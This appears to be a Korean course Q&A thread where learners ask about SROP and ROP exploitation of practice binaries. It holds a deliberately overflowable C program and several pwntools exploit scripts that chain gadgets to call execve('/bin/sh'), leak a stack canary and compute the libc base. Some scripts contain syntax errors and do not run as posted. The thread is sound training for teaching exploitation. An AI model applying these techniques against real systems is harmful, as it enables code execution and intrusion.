Pwntools의 SigreturnFrame()를 사용하지 않고 직접 페이로드를 구성해서 Srop 익스플로잇 코드를 작성하고 싶었습니다. 여기서 이해되지 않는 부분이 sigreturn 시스템콜 호출을 통해서 스택에 있는 값들이 레지스터에 복사가 된다고 했는데 스택에서 어디 부분부터 레지스터에 복사가 되나요? 예시를 위해 이 문제의 코드를 기준으로 질문을 드리겠습니다. // Name: srop.c // Compile: gcc -o srop srop.c -fno-stack-protector -no-pie #include <unistd.h> int gadget() { asm("pop %rax;" "syscall;" "ret" ); } int main() { char buf[16]; read(0, buf ,1024); } 위 소스 코드의 바이너리에서 srop를 하기 위한 기본적인 페이로드 구성은 다음과 같습니다. payload = b'A'*16 # buf payload += b'B'*8 # sfp payload += p64(gadget) # pop rax; syscall; ret payload += p64(15) # sigreturn 위처럼 페이로드를 구성한 뒤에 payload += bytes(frame)을 통해서 익스플로잇을 하는 것이 강의에서 사용했던 방식입니다. 여기서 제가 궁금한 것이 SigreturnFrame()을 사용하지 않고 페이로드를 구성한다고 했을 때 저 페이로드 기준으로 스택에 몇 오프셋부터 값을 덮어야 그 값이 레지스터에 복사가 되나요? (이해가 되지 않아 강의를 여러번 보고, 관련된 Srop 글들을 봤는데도 딱히 저 오프셋 관련된 부분에 대한 답을 구하지 못 했습니다.)

Can anyone help me my code is not working? from pwn import * context.binary = exe = ELF('./srop', checksec = False) context.log_level = 'debug' p = process(exe.path) syscall = 0x00000000004004ec binsh = 0x0000000000601a00 pop_rdi = 0x0000000000400583 pop_rax_sys = 0x00000000004004eb pop_rsi_r15 = 0x0000000000400581 payload = b'A'*0x18 payload += p64(pop_rdi) + p64(0) payload += p64(pop_rsi_r15) + p64(binsh) + p64(0) payload += p64(exe.sym['read']) payload += p64(pop_rdi) + p64(binsh) payload += p64(pop_rsi_r15) +p64(0) + p64(0) payload += p64(pop_rax_sys) + p64(0x3b) input() p.send(payload) sleep(1) p.send(b'/bin/sh\0') p.interactive()

다풀엇지만 execve("/bin/sh", 0, 0) frame2.rsp = bss + 0x500 frame2.rdi = bss + 0x108 여기 이부분이 이해가 안되요 frame2.rdi = bss + 0x108 이부분이 bin sh 인거같은데 왜 108을 할당하는지 frame2.rsp = bss + 0x500 여기는 왜500 인지 모르겟네요 ㅜ

강의에서 익스플로잇코드 중 이중 저는 read_got =elf.got["read"] 이런식으로하면 key error 가 나타나서got 주소를 구할려고 하는데 어덯해 구하는지 모르겟네여 gef> got 이런식으로 해도 반응이 없는데 got 주소 구하는 방법좀 알려주세요 ㅜ

이런 에러가뜬는데 뭐가 문재인건가요? Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'lb' is not defined NameError: name 'system' is not defined 코드는 이렇개 작성햇습니다 from pwn import * def slog(name, addr): return success(": ".join([name, hex(addr)])) #context.log_level = 'debug' p = process("./rop") e = ELF("./rop") libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") buf = b"A"*0x39 p.sendafter("Buf: ", buf) p.recvuntil(buf) cnry = u64(b"\x00"+p.recvn(7)) slog("canary", cnry) read_plt = e.plt['read'] read_got = e.got['read'] puts_plt = e.plt['puts'] pop_rdi = 0x00000000004007f3 pop_rsi_r15 = 0x00000000004007f1 payload = b"A"0x38 + p64(cnry) + b"B"0x8 payload += p64(pop_rdi) + p64(read_got) payload += p64(puts_plt) p.sendafter("Buf: ", payload) read = u64(p.recvn(6)+b"\x00"*2) lb = read - libc.symbols["read"] system = lb + libc.symbols["system"] slog("read", read) slog("libc_base", lb) slog("system", system) p.interactive()